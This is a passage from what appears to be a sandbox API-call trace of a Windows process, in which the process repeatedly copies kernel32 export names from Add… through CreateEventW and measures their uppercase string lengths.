(lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0180.989] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0180.989] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0180.989] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0180.989] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0180.989] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0180.989] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0180.989] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0180.989] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0180.990] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0180.990] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0180.990] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0180.990] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0180.990] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0180.990] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0180.990] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0180.990] lstrlenA (lpString="BACKUPREAD") returned 10 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0180.990] lstrlenA (lpString="BACKUPSEEK") returned 10 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0180.990] lstrlenA (lpString="BACKUPWRITE") returned 11 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0180.990] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0180.990] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0180.990] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0180.990] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0180.990] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0180.990] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0180.990] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0180.990] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0180.990] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0180.990] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0180.990] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0180.991] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0180.991] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0180.991] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0180.991] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0180.991] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0180.991] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0180.991] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0180.991] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0180.991] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0180.991] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0180.991] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0180.991] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0180.991] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0180.991] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0180.991] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0180.991] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0180.991] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0180.991] lstrlenA (lpString="BEEP") returned 4 [0180.991] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0180.991] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0180.992] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0180.992] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0180.992] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0180.992] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0180.992] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0180.992] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0180.992] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0180.992] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0180.992] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0180.992] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0180.992] lstrlenA (lpString="CANCELIO") returned 8 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0180.992] lstrlenA (lpString="CANCELIOEX") returned 10 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0180.992] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0180.992] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0180.992] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0180.992] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0180.992] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0180.992] lstrlenA (lpString="CHECKELEVATION") returned 14 [0180.992] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0180.993] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0180.993] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0180.993] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0180.993] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0180.993] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0180.993] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0180.993] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0180.993] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0180.993] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0180.993] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0180.993] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0180.993] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0180.993] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0180.993] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0180.993] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0180.993] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0180.993] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0180.993] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0180.993] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0180.993] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0180.994] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0180.994] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0180.994] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0180.994] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0180.994] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0180.994] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0180.994] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0180.994] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0180.994] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0180.994] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0180.994] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0180.994] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0180.994] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0180.994] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0180.994] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0180.994] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0180.994] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0180.994] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0180.994] lstrlenA (lpString="COPYCONTEXT") returned 11 [0180.994] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0180.995] lstrlenA (lpString="COPYFILEA") returned 9 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0180.995] lstrlenA (lpString="COPYFILEEXA") returned 11 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0180.995] lstrlenA (lpString="COPYFILEEXW") returned 11 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0180.995] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0180.995] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0180.995] lstrlenA (lpString="COPYFILEW") returned 9 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0180.995] lstrlenA (lpString="COPYLZFILE") returned 10 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0180.995] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0180.995] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0180.995] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0180.995] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0180.995] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0180.995] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0180.995] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0180.995] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0180.995] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0180.995] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0180.995] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0180.995] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0180.995] lstrlenA (lpString="CREATEEVENTA") returned 12 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0180.996] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0180.996] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0180.996] lstrlenA (lpString="CREATEEVENTW") returned 12 [0180.996] lstrcpyA (in: lpString1=0x36fce30, 